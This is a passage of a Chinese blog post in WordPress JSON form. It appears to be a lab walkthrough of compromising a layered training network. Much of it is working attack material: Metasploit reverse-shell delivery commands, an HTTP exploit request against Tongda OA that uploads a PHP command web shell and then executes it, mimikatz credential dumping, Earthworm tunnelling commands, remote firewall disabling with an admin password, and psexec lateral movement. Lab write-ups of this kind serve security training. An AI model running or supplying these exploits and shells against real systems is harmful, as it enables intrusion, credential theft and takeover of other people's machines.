\u8fd9\u91cc\u6211\u6709\u4e2a\u7591\u60d1\uff0c52.20\u4e0d\u5e94\u8be5\u662f\u5185\u7f51\u5417\uff0c\u600e\u4e48\u80fd\u901a\u8fc7ssh\u8fde\u4e0a\u7684\uff0c\u540e\u6765\u8bbf\u95ee52.10\uff08\u537343.206\u7684\u53e6\u4e00\u4e2aip\uff09\u53d1\u73b0\u4e5f\u80fd\u767b\u4e0alaravel\uff0c\u6240\u4ee552\u6bb5\u5e94\u8be5\u4e0d\u662f\u5185\u7f51\u3002<\/p>\n\n\n\n

\u5982\u679c52\u5c31\u662f\u5185\u7f51\u6bb5\u600e\u4e48\u529e\uff1f\u537352.20\u8fd9\u4e2a\u53cd\u5411\u4ee3\u7406\u7684\u4e3b\u673a\u6ca1\u6709\u516c\u7f51ip\uff0c\u90a3\u53c8\u600e\u4e48\u8fde\u5462\uff1f\u53ef\u4ee5\u752852.10\u6765\u8fde\uff0c\u56e0\u4e3assh\u5df2\u7ecf\u5199\u572852.20\u4e0a\u4e86\uff0c\u5916\u7f51\u8fde\u4e0d\u523052.20\uff0c52.10\u80af\u5b9a\u80fd\u8fde\u4e0a52.20\uff0c\u6240\u4ee5\u4e0d\u662f\u95ee\u9898\u3002<\/p>\n\n\n\n

\u4e24\u53f0\u4e3b\u673a\u90fd\u4e0a\u7ebf\uff1a<\/p>\n\n\n\n

use exploit\/multi\/script\/web_delivery<\/p>\n\n\n\n

set target 7 # \u9009\u62e9\u76ee\u6807\u7cfb\u7edf<\/p>\n\n\n\n

set payload linux\/x64\/meterpreter\/reverse_tcp<\/p>\n\n\n\n

set lhost 192.168.52.128<\/p>\n\n\n\n

set lport 4445<\/p>\n\n\n\n

run<\/p>\n\n\n\n

\/\/\u7136\u540e\u7528\u53d7\u5bb3\u673a\u590d\u5236\u8fd0\u884cmsf\u7ed9\u7684wget\u4ee3\u7801<\/p>\n\n\n\n

set lport 4446<\/p>\n\n\n\n

run<\/p>\n\n\n\n

\/\/\u7b2c\u4e8c\u53f0\u4e00\u6837<\/p>\n\n\n\n

\"\"<\/div><\/figure>\n\n\n\n

session -i 1 \/\/\u8fdb\u5165session1<\/p>\n\n\n\n

\u56e0\u4e3a\u8fd9\u91cc\u53ef\u4ee5\u8ddfweb2\uff08192.168.52.20\uff09\u4e92\u901a\uff0c\u6240\u4ee5\u53ef\u4ee5\u7565\u8fc7\u5efa\u96a7\u9053\u7684\u64cd\u4f5c\uff0c\u5982\u679c52\u662f\u5185\u7f51\u7684\u8bdd\u8fd8\u9700\u8981\u5efa\u7acb\u96a7\u9053\uff0c\u8fd9\u91cc\u4e5f\u7ec3\u4e60\u4e00\u4e0b\uff1a<\/p>\n\n\n\n

\u4e0b\u8f7d\u4e0d\u4e86earthworm\uff0c\u6709\u65f6\u95f4\u518d\u6765\u8865\u5751\u5427<\/p>\n\n\n\n

\u7ee7\u7eed\uff0c\u73b0\u5728\u7684\u76ee\u6807\u662f192.168.52.30\u8fd9\u4e2a\u673a\u5b50\uff0c\u56e0\u4e3a\u5b83\u5f00\u4e86\u9632\u706b\u5899\uff0c\u600e\u4e48\u7ed5\u90fd\u7ed5\u4e0d\u8fc7\u53bb\uff0c\u53ea\u80fd\u624b\u52a8\u628a\u9632\u706b\u5899\u5173\u6389<\/p>\n\n\n\n

\u53d1\u73b08080\u7aef\u53e3\u6709\u901a\u8fbeOA<\/p>\n\n\n\n

\u5229\u7528\u901a\u8fbeOA\u8fdc\u7a0b\u547d\u4ee4\u6267\u884c\u6f0f\u6d1e\u8bd5\u8bd5\uff1a<\/p>\n\n\n\n

\u8bbf\u95ee192.168.52.30\/ispirit\/im\/upload.php\uff0c\u6293\u5305\uff1a<\/p>\n\n\n\n

\"\"<\/div><\/figure>\n\n\n\n

\u653e\u5230\u91cd\u653e\u5668\u91cc\u9762\u6784\u9020\u4e00\u4e0bpayload\uff1a<\/p>\n\n\n\n

POST \/ispirit\/im\/upload.php HTTP\/1.1<\/p>\n\n\n\n

Host: 192.168.52.30\u001a8080<\/p>\n\n\n\n

Content-Length: 656<\/p>\n\n\n\n

Cache-Control: no-cache<\/p>\n\n\n\n

User-Agent: Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/80.0.3987.132 Safari\/537.36<\/p>\n\n\n\n

Content-Type: multipart\/form-data; boundary=—-WebKitFormBoundarypyfBh1YB4pV8McGB<\/p>\n\n\n\n

Accept: *\/*<\/p>\n\n\n\n

Accept-Encoding: gzip, deflate<\/p>\n\n\n\n

Accept-Language: zh-CN,zh;q=0.9,zh-HK;q=0.8,ja;q=0.7,en;q=0.6,zh-TW;q=0.5<\/p>\n\n\n\n

Cookie: PHPSESSID=123<\/p>\n\n\n\n

Connection: close<\/p>\n\n\n\n

——WebKitFormBoundarypyfBh1YB4pV8McGB<\/p>\n\n\n\n

Content-Disposition: form-data; name=”UPLOAD_MODE”<\/p>\n\n\n\n

2<\/p>\n\n\n\n

——WebKitFormBoundarypyfBh1YB4pV8McGB<\/p>\n\n\n\n

Content-Disposition: form-data; name=”P”<\/p>\n\n\n\n

123<\/p>\n\n\n\n

——WebKitFormBoundarypyfBh1YB4pV8McGB<\/p>\n\n\n\n

Content-Disposition: form-data; name=”DEST_UID”<\/p>\n\n\n\n

1<\/p>\n\n\n\n

——WebKitFormBoundarypyfBh1YB4pV8McGB<\/p>\n\n\n\n

Content-Disposition: form-data; name=”ATTACHMENT”; filename=”jpg”<\/p>\n\n\n\n

Content-Type: image\/jpeg<\/p>\n\n\n\n

<?php<\/p>\n\n\n\n

$command=$_POST[‘cmd’];<\/p>\n\n\n\n

$wsh = new COM(‘WScript.shell’);<\/p>\n\n\n\n

$exec = $wsh->exec(“cmd \/c “.$command);<\/p>\n\n\n\n

$stdout = $exec->StdOut();<\/p>\n\n\n\n

$stroutput = $stdout->ReadAll();<\/p>\n\n\n\n

echo $stroutput;<\/p>\n\n\n\n

?><\/p>\n\n\n\n

——WebKitFormBoundarypyfBh1YB4pV8McGB–<\/p>\n\n\n\n

\u5c11\u4e86Content-Type: multipart\/form-data; boundary=—-WebKitFormBoundarypyfBh1YB4pV8McGB\u5b57\u6bb5\u4f1a\u5bfc\u81f4\u4e0a\u4f20\u5931\u8d25\uff01\uff01\uff01<\/p>\n\n\n\n

\u800c\u4e14GET\u5fc5\u987b\u6539\u6210POST\uff01<\/p>\n\n\n\n

\u53d1\u73b0\u8fd4\u56de\u4e00\u4e2a\u672a\u767b\u5f55\uff0c\u60f3\u8d77\u6765PC1\u5fd8\u8bb0\u5f00\u901a\u8fbeOA\u4e86\uff0c\u53bbPC1\u5f00\u4e00\u4e0b\uff0c\u518d\u91cd\u590d\u4e00\u904d\uff0c\u53d1\u73b0\u4e0a\u4f20\u6210\u529f\u4e14\u6709\u6587\u4ef6\u8def\u5f84\u56de\u4f20<\/p>\n\n\n\n

\"\"<\/div><\/figure>\n\n\n\n

\u7136\u540e<\/p>\n\n\n\n

POST \/ispirit\/interface\/gateway.php HTTP\/1.1<\/p>\n\n\n\n

Host: 192.168.52.30:8080<\/p>\n\n\n\n

Connection: keep-alive<\/p>\n\n\n\n

Accept-Encoding: gzip, deflate<\/p>\n\n\n\n

Accept: *\/*<\/p>\n\n\n\n

User-Agent: python-requests\/2.21.0<\/p>\n\n\n\n

Content-Length: 87<\/p>\n\n\n\n

Content-Type: application\/x-www-form-urlencoded<\/p>\n\n\n\n

json={“url”:”\/general\/..\/..\/attach\/im\/2409\/1588936655.jpg”}&cmd=whoami<\/p>\n\n\n\n

\uff08\u8fd9\u91cc\u7684cmd\u5373\u6267\u884c\u7684\u547d\u4ee4\uff0c2409\/1588936655.jpg\u5728\u4e0a\u9762\u56de\u663e\u7684\u5730\u5740\u91cc\u9762\u6709\uff09<\/p>\n\n\n\n

\u7136\u540emsf\u4e0a\u7ebf\uff1a<\/p>\n\n\n\n

use exploit\/multi\/script\/web_delivery
set target 2
set payload windows\/meterpreter\/reverse_tcp
set lhost 192.168.52.128
set lport 4447
run<\/p>\n\n\n\n

\u628a\u751f\u6210\u7684\u547d\u4ee4\u53d1\u5305\u653e\u5230cmd\u6267\u884c\uff0c\u6210\u529f\u4e0a\u7ebf\uff1a<\/p>\n\n\n\n

\"\"<\/div><\/figure>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n

\u8fd9\u6837\uff0c\u7b2c\u4e8c\u5c42\uff0852\u6bb5\uff09\u6211\u4eec\u4e5f\u6210\u529f\u62ff\u4e0b\uff0c\u76ee\u524d\u62d3\u6251\u56fe\u5982\u4e0b\uff1a<\/p>\n\n\n\n

\"\"<\/div><\/figure>\n\n\n\n

\u5f00\u59cb\u5bf993\u6bb5\u4e0b\u624b\uff0c\u5df2\u77e5web2\u662f93.10\uff0cpc1\u662f93.20\uff0cpc1\u4e0aarp -n\u53d1\u73b0\u4e86\u53e6\u5916\u4e24\u53f0\u673a\u5b5093.30\u548c93.40\uff1a<\/p>\n\n\n\n

\"\"<\/div><\/figure>\n\n\n\n

\u7ee7\u7eed\u4fe1\u606f\u6536\u96c6\uff1a<\/p>\n\n\n\n

ipconfig \/all # \u67e5\u770b\u672c\u673aip\uff0c\u6240\u5728\u57df<\/p>\n\n\n\n

route print # \u6253\u5370\u8def\u7531\u4fe1\u606f<\/p>\n\n\n\n

net view # \u67e5\u770b\u5c40\u57df\u7f51\u5185\u5176\u4ed6\u4e3b\u673a\u540d<\/p>\n\n\n\n

arp -a # \u67e5\u770barp\u7f13\u5b58<\/p>\n\n\n\n

net start # \u67e5\u770b\u5f00\u542f\u4e86\u54ea\u4e9b\u670d\u52a1<\/p>\n\n\n\n

net share # \u67e5\u770b\u5f00\u542f\u4e86\u54ea\u4e9b\u5171\u4eab<\/p>\n\n\n\n

net share ipc$ # \u5f00\u542fipc\u5171\u4eab<\/p>\n\n\n\n

net share c$ # \u5f00\u542fc\u76d8\u5171\u4eab<\/p>\n\n\n\n

net use \\\\192.168.xx.xx\\ipc$ “” \/user:”” # \u4e0e192.168.xx.xx\u5efa\u7acb\u7a7a\u8fde\u63a5<\/p>\n\n\n\n

net use \\\\192.168.xx.xx\\c$ “\u5bc6\u7801” \/user:”\u7528\u6237\u540d” # \u5efa\u7acbc\u76d8\u5171\u4eab<\/p>\n\n\n\n

dir \\\\192.168.xx.xx\\c$\\user # \u67e5\u770b192.168.xx.xx c\u76d8user\u76ee\u5f55\u4e0b\u7684\u6587\u4ef6<\/p>\n\n\n\n

net config Workstation # \u67e5\u770b\u8ba1\u7b97\u673a\u540d\u3001\u5168\u540d\u3001\u7528\u6237\u540d\u3001\u7cfb\u7edf\u7248\u672c\u3001\u5de5\u4f5c\u7ad9\u3001\u57df\u3001\u767b\u5f55\u57df<\/p>\n\n\n\n

net user # \u67e5\u770b\u672c\u673a\u7528\u6237\u5217\u8868<\/p>\n\n\n\n

net user \/domain # \u67e5\u770b\u57df\u7528\u6237<\/p>\n\n\n\n

net localgroup administrators # \u67e5\u770b\u672c\u5730\u7ba1\u7406\u5458\u7ec4\uff08\u901a\u5e38\u4f1a\u6709\u57df\u7528\u6237\uff09<\/p>\n\n\n\n

net view \/domain # \u67e5\u770b\u6709\u51e0\u4e2a\u57df<\/p>\n\n\n\n

net user \u7528\u6237\u540d \/domain # \u83b7\u53d6\u6307\u5b9a\u57df\u7528\u6237\u7684\u4fe1\u606f<\/p>\n\n\n\n

net group \/domain # \u67e5\u770b\u57df\u91cc\u9762\u7684\u5de5\u4f5c\u7ec4\uff0c\u67e5\u770b\u628a\u7528\u6237\u5206\u4e86\u591a\u5c11\u7ec4\uff08\u53ea\u80fd\u5728\u57df\u63a7\u4e0a\u64cd\u4f5c\uff09<\/p>\n\n\n\n

net group \u7ec4\u540d \/domain # \u67e5\u770b\u57df\u4e2d\u67d0\u5de5\u4f5c\u7ec4<\/p>\n\n\n\n

net time \/domain \/\/ \u4e3b\u57df\u670d\u52a1\u5668\u4f1a\u540c\u65f6\u4f5c\u4e3a\u65f6\u95f4\u670d\u52a1\u5668<\/p>\n\n\n\n

net group “domain admins” \/domain # \u67e5\u770b\u57df\u7ba1\u7406\u5458\u7684\u540d\u5b57<\/p>\n\n\n\n

net group “domain computers” \/domain # \u67e5\u770b\u57df\u4e2d\u7684\u5176\u4ed6\u4e3b\u673a\u540d<\/p>\n\n\n\n

net group “doamin controllers” \/domain # \u67e5\u770b\u57df\u63a7\u5236\u5668\uff08\u53ef\u80fd\u6709\u591a\u53f0\uff09<\/p>\n\n\n\n

net group “Enterprise Admins” \/domain \/\/ \u67e5\u770b\u57df\u7ba1\u7406\u5458\u7ec4<\/p>\n\n\n\n

\u4f7f\u7528msf\u7684kiwi\u6293\u53d6\u5bc6\u7801\uff1a<\/p>\n\n\n\n

ps \/\/\u67e5\u770b\u8fdb\u7a0b<\/p>\n\n\n\n

migrate \u8fdb\u7a0b\u53f7 \/\/\u8fc1\u79fb\u8fdb\u7a0b<\/p>\n\n\n\n

load kiwi
kiwi_cmd privilege::debug
kiwi_cmd sekurlsa::logonPasswords<\/p>\n\n\n\n

\"\"<\/div><\/figure>\n\n\n\n

\u7531\u4e8e93\u662f\u5185\u7f51\u6bb5\uff0c\u6240\u4ee5\u5fc5\u987b\u642d\u96a7\u9053\uff0c\u8fd9\u91cc\u7528ew\uff08earthworm\uff09\uff0c52.30\u5f53\u8df3\u677f\u6765\u642d\u96a7\u9053\u3002<\/p>\n\n\n\n

msf\u6267\u884c\uff1a<\/p>\n\n\n\n

route add 192.168.93.0 255.255.255.0 5 \/\/\u6dfb\u52a0\u8def\u7531<\/p>\n\n\n\n

\u8fdb\u5165meter\u6267\u884c\uff1a<\/p>\n\n\n\n

upload ew\/ew_for_Win.exe \/\/\u4e0a\u4f20ew<\/p>\n\n\n\n

\u7136\u540e\u76d1\u542c\uff1a<\/p>\n\n\n\n

nohup .\/ew_for_linux64 -s lcx_listen -l 1090 -e 1235 2>1&<\/p>\n\n\n\n

\uff08\u7f51\u4e0a\u662fnohup .\/ew_for_linux64 -s lcx_listen -l 1090 -e 1235 &\uff0c\u4f1a\u62a5\u9519\uff0c\u628a&\u6539\u62102\u300b1&\u5c31\u597d\u4e86\uff09<\/p>\n\n\n\n

52.30\u4e0a\u6267\u884c\uff1a<\/p>\n\n\n\n

start \/min ew_for_Win.exe -s ssocksd -l 999<\/p>\n\n\n\n

\u518d\u628aew\u4f20\u523052.10\u8fd9\u4e2a\u673a\u5b50\u4e0a\uff0c\u6267\u884c\u4e2d\u95f4\u6865\u6881\uff1a<\/p>\n\n\n\n

.\/ew_for_linux64 -s lcx_slave -d 192.168.52.128 -e 1235 -f 192.168.52.30 -g 999<\/p>\n\n\n\n

\u8fd9\u6837\u5c31\u5efa\u597d\u4e86\u96a7\u9053<\/p>\n\n\n\n

\u626b\u63cf\u53d1\u73b093.30\u548c93.40\u90fd\u5f00\u542f\u4e86445\u7aef\u53e3\uff0c\u53ef\u80fd\u5b58\u5728\u6c38\u6052\u4e4b\u84dd\uff1a<\/p>\n\n\n\n

use auxiliary\/scanner\/smb\/smb_version<\/p>\n\n\n\n

set rhosts 192.168.93.1-255<\/p>\n\n\n\n

set threads 5<\/p>\n\n\n\n

run<\/p>\n\n\n\n

\u6d4b\u8bd5\u4e00\u4e0b\u6c38\u6052\u4e4b\u84dd\u662f\u5426\u5b58\u5728\uff1a<\/p>\n\n\n\n

use auxiliary\/scanner<\/u><\/a>\/smb\/smb_ms17_010
set RHOSTS 192.168.93.30
run<\/p>\n\n\n\n

\u5b58\u5728\uff1a<\/p>\n\n\n\n

\"\"<\/div><\/figure>\n\n\n\n

\u653b\u51fb\uff1a\u653b\u51fb\u5931\u8d25\uff0c\u53ef\u80fd\u662f\u5f00\u542f\u4e86\u9632\u706b\u5899\uff1a<\/p>\n\n\n\n

\"\"<\/div><\/figure>\n\n\n\n

\u56e0\u4e3a\u77e5\u9053\u4e86\u7ba1\u7406\u5458\u8d26\u53f7\u5bc6\u7801\uff0c\u53ef\u4ee5\u752852.30\u8fd9\u4e2a\u673a\u5b50\u6765\u5173\u95ed93.30\u7684\u9632\u706b\u5899\uff1a<\/p>\n\n\n\n

net use \\\\192.168.93.30\\ipc$ “Whoami2021″ \/user:”Administrator”<\/p>\n\n\n\n

sc \\\\192.168.93.30 create unablefirewall binpath= “netsh advfirewall set allprofiles state off”<\/p>\n\n\n\n

sc \\\\192.168.93.30 start unablefirewall<\/p>\n\n\n\n

\uff08\u5fd8\u4e86\u8fd8\u6709ipc\uff0c\u5c45\u7136\u80fd\u7528PC1\u5173PC2\u7684\u9632\u706b\u5899\uff09<\/p>\n\n\n\n

\u4f46\u662f\u5173\u4e86\u4e4b\u540e\u6c38\u6052\u4e4b\u84dd\u8fd8\u662f\u5931\u8d25\uff0c\u90a3\u5c31\u8bd5\u4e00\u4e0bpsexec\u6a2a\u5411\uff1a<\/p>\n\n\n\n

\u8fd8\u662f\u5931\u8d25\uff0c\u53ef\u80fd\u662fmsf\u6709\u70b9\u95ee\u9898\uff0c\u90a3\u5c31\u6362cs\u8bd5\u8bd5<\/p>\n\n\n\n

\u5148\u628a52.30\u4e0a\u7ebf\u4e00\u4e0bCS\uff0c<\/p>\n\n\n\n

\u6210\u529f\uff1a<\/p>\n\n\n\n

\"\"<\/div><\/figure>\n\n\n\n

\u7136\u540e\u5c31\u662f\u5e38\u89c4\u7684psexec\u6a2a\u5411\uff1a<\/p>\n\n\n\n

\u6210\u529f\uff1a<\/p>\n\n\n\n

\"\"<\/div><\/figure>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n

\u81f3\u6b64\uff0c\u6240\u6709\u9776\u673a\u5168\u90e8\u62ff\u4e0b<\/p>\n\n\n\n

\"\"<\/div><\/figure>\n","protected":false},"excerpt":{"rendered":"

\u642d\u5efa\u7565 \u6253\u9776\uff1a \u5df2\u77e5\u76ee\u6807\u9776\u673ahttp:\/\/192.168.43.206 Nmap\u626b\uff0c\u53d1\u73b022\u300180\u300181\u7aef\u53e3\uff1a […]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[9],"tags":[10],"class_list":["post-164","post","type-post","status-publish","format-standard","hentry","category-9","tag-10"],"_links":{"self":[{"href":"http:\/\/n0ps1ed.top\/index.php\/wp-json\/wp\/v2\/posts\/164","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/n0ps1ed.top\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/n0ps1ed.top\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/n0ps1ed.top\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/n0ps1ed.top\/index.php\/wp-json\/wp\/v2\/comments?post=164"}],"version-history":[{"count":1,"href":"http:\/\/n0ps1ed.top\/index.php\/wp-json\/wp\/v2\/posts\/164\/revisions"}],"predecessor-version":[{"id":209,"href":"http:\/\/n0ps1ed.top\/index.php\/wp-json\/wp\/v2\/posts\/164\/revisions\/209"}],"wp:attachment":[{"href":"http:\/\/n0ps1ed.top\/index.php\/wp-json\/wp\/v2\/media?parent=164"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/n0ps1ed.top\/index.php\/wp-json\/wp\/v2\/categories?post=164"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/n0ps1ed.top\/index.php\/wp-json\/wp\/v2\/tags?post=164"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}